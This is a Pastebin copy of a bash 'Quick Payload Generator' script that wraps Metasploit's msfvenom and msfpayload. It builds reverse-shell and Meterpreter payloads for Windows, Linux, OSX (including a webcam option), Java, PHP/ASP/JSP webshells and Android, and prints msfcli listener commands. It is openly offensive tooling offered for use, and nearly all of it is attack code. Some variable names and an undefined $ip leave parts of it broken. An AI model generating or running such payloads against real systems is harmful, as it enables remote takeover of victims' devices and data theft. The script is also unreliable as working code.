Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- #
- echo "Quick Payload Generator"
- echo "Version 4.0.5, Alpha E"
- echo "Ready..."
- echo ">access security"
- echo "access: PERMISSION DENIED."
- echo ">access security grid"
- echo "access: PERMISSION DENIED."
- echo ">access main security grid"
- echo "access: PERMISSION DENIED....and..."
- echo "YOU DIDN'T SAY THE MAGIC WORD!"
- echo "YOU DIDN'T SAY THE MAGIC WORD!"
- echo "YOU DIDN'T SAY THE MAGIC WORD!"
- echo "YOU DIDN'T SAY THE MAGIC WORD!"
- echo "YOU DIDN'T SAY THE MAGIC WORD!"
- echo "YOU DIDN'T SAY THE MAGIC WORD!"
- echo "YOU DIDN'T SAY THE MAGIC WORD!"
- echo -e "\033[33;5mEnter Your IP Address\033[0m"
- echo -n "address: "
- read address
- echo -e "\033[33;5mEnter Port To Use\033[0m"
- echo -n "port: "
- read port
- echo -e "\033[33;5mEnter Payload Name\033[0m"
- echo -n "pkg: "
- read pkg
- while true; do
- read -p "Select Payload Type
- ========================
- 1 for Windows Payload
- 2 for Linux Payload
- 3 for Apple OSX Payload
- 4 for Java Payload
- 5 for Webshell
- 6 for Android Payload
- q to quit" 123456q
- case $123456q in
- [1]* ) while true; do
- read -p "Windows Payload Menu
- ==================================
- 10 Windows Meterpreter Reverse Tcp
- 11 Windows Shell Reverse_TCP
- 12 Payload using msfvenom
- 13 Custom Shell Code
- q quit" 1234q
- case $1234q in
- [1]* ) ./cmd/quick/win.sh windows/meterpreter/reverse_tcp $address $port $pkg exploits/$pkg.exe
- chmod +x exploits/$pkg.exe
- echo "To start listener copy and paste this code in to your terminal"
- echo "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
- sleep 3; break;;
- [2]* ) ./cmd/quick/win.sh windows/shell_reverse_tcp $address $port $pkg exploits/$pkg.exe
- chmod +x exploits/$pkg.exe
- echo "To start listener copy and paste this code in to your terminal"
- echo "msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
- sleep 3; break;;
- [3]* ) msfvenom -p windows/meterpreter/reverse_tcp LHOST=$address LPORT=$port EXITFUNC=thread -a x86 -e x86/shikata_ga_nai 40 -f exe>exploits/$pkg.exe
- chmod +x exploits/$pkg.exe
- echo "To start listener copy and paste this code in to your terminal"
- echo "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
- sleep 3; break;;
- [4]* ) ./cmd/quick/shellcode.sh $ip $port exploits/$pkg.exe
- chmod +x exploits/$pkg.exe
- echo "To start listener copy and paste this code in to your terminal"
- echo "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
- sleep 3; break;;
- [q]* ) break;;
- * ) echo "answer 1 2 3 4 q.";;
- esac
- done
- [2]* ) while true; do
- read -p "Linux Payload Menu
- ==================================
- 1 Linux x86 Meterpreter Reverse Tcp
- 2 Linux x86 shell reverse_tcp
- q quit " 12q
- case $12q in
- [1]* ) ./cmd/quick/linux.sh linux/x86/meterpreter/reverse_tcp $address $port exploits/$pkg
- chmod +x exploits/$pkg
- echo "To start listener copy and paste this code in to your terminal"
- echo "msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
- sleep 3; break;;
- [2]* ) ./cmd/quick/linux.sh linux/x86/shell_reverse_tcp $address $port exploits/$pkg
- chmod +x exploits/$pkg
- echo "To start listener copy and paste this code in to your terminal"
- echo "msfcli exploit/multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
- sleep 3; break;;
- [q]* ) break;;
- * ) echo "answer 1 2 q.";;
- esac
- done
- [3]* ) while true; do
- read -p "Apple OSX Payload Menu
- ==================================
- 1 OSX Reverse TCP
- 2 OSX Isight bind_tcp
- q quit" 12q
- case $12q in
- [1]* ) msfpayload osx/x86/shell_reverse_tcp LHOST=$address LPORT=$port x>exploits/$pkg.pkg
- chmod 755 exploits/$pkg.pkg
- echo "To start listener copy and paste this code in to your terminal"
- echo "msfcli exploit/multi/handler PAYLOAD=osx/x86/shell_reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
- sleep 3; break;;
- [2]* ) msfpayload osx/x86/isight/bind_tcp LHOST=$address LPORT=$port x>exploits/$pkg.pkg
- chmod 755 exploits/$pkg.pkg
- echo "To start listener copy and paste this code in to your terminal"
- echo "msfcli exploit/multi/handler PAYLOAD=osx/x86/isight/bind_tcp LHOST='.$address.' LPORT='.$port.' E"
- sleep 3; break;;
- [q]* ) break;;
- * ) echo "answer 1 2 q.";;
- esac
- done
- [4]* ) while true; do
- read -p "Java Payload Menu
- ==================================
- 1 Java meterpreter reverse_tcp
- 2 Java shell reverse_tcp
- 3 Java shell bind_tcp
- q quit" 123q
- case $123q in
- [1]* ) msfpayload java/meterpreter/reverse_tcp LHOST=$address LPORT=$port R >exploits/$pkg.jar
- chmod 777 exploits/$pkg.jar
- echo "To start listener copy and paste this code in to your terminal"
- echo "msfcli exploit/multi/handler PAYLOAD=java/meterpreter/reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
- sleep 3; break;;
- [2]* ) msfpayload java/shell/reverse_tcp LHOST=$address LPORT=$port R >exploits/$pkg.jar
- chmod 777 exploits/$pkg.jar
- echo "To start listener copy and paste this code in to your terminal"
- echo "msfcli exploit/multi/handler PAYLOAD=java/shell/reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
- sleep 3; break;;
- [3]* ) msfpayload java/shell/bind_tcp LHOST=$address LPORT=$port R >exploits/$pkg.jar
- chmod 777 exploits/$pkg.jar
- echo "To start listener copy and paste this code in to your terminal"
- echo "msfcli exploit/multi/handler PAYLOAD=java/shell/bind_tcp LHOST='.$address.' LPORT='.$port.' E"
- sleep 3; break;;
- [q]* ) break;;
- * ) echo "answer 1 2 3 q.";;
- esac
- done
- [5]* ) while true; do
- read -p "Webshell Payload Menu
- ==================================
- 1 PHP Meterpreter Reverse_tcp
- 2 ASP Page with metasploit payload
- 3 Java JSP Command Shell, Reverse TCP Inline
- q quit" 123q
- case $123q in
- [1]* ) msfpayload php/meterpreter/reverse_tcp LHOST=$address LPORT=$port R >exploits/$pkg.php
- echo "To start listener copy and paste this code in to your terminal"
- echo "msfcli exploit/multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
- sleep 3; break;;
- [2]* ) ./cmd/quick/asp.sh $ip $port exploits/$pkg.asp
- chmod 755 exploits/$pkg.asp
- echo " To start listener copy and paste this code in to your terminal"
- echo "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
- sleep 3; break;;
- [3]* ) msfpayload java/jsp_shell_reverse_tcp LHOST=$address LPORT=$port R >exploits/$pkg.jsp
- chmod 755 exploits/$pkg.jsp
- echo "To start listener copy and paste this code in to your terminal"
- echo "msfcli exploit/multi/handler PAYLOAD=java/jsp_shell_reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
- sleep 3; break;;
- [q]* ) break;;
- * ) echo "answer 1 2 3 q.";;
- esac
- done
- [6]* ) while true; do
- read -p "Android Payload Menu
- ==================================
- 1 Android Meterpreter
- q quit" 1q
- case $1q in
- [1]* ) msfpayload android/meterpreter/reverse_tcp LHOST=$address LPORT=$port R >exploits/$pkg.apk
- chmod +x exploits/$pkg.apk
- echo "To start listener copy and paste this code in to your terminal"
- echo "msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
- sleep 3; break;;
- [q]* ) break;;
- * ) echo "answer 1 q.";;
- esac
- done
- [q]* ) exit;;
- * ) echo "answer 1 2 3 4 5 6 q.";;
- esac
- done
- #exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement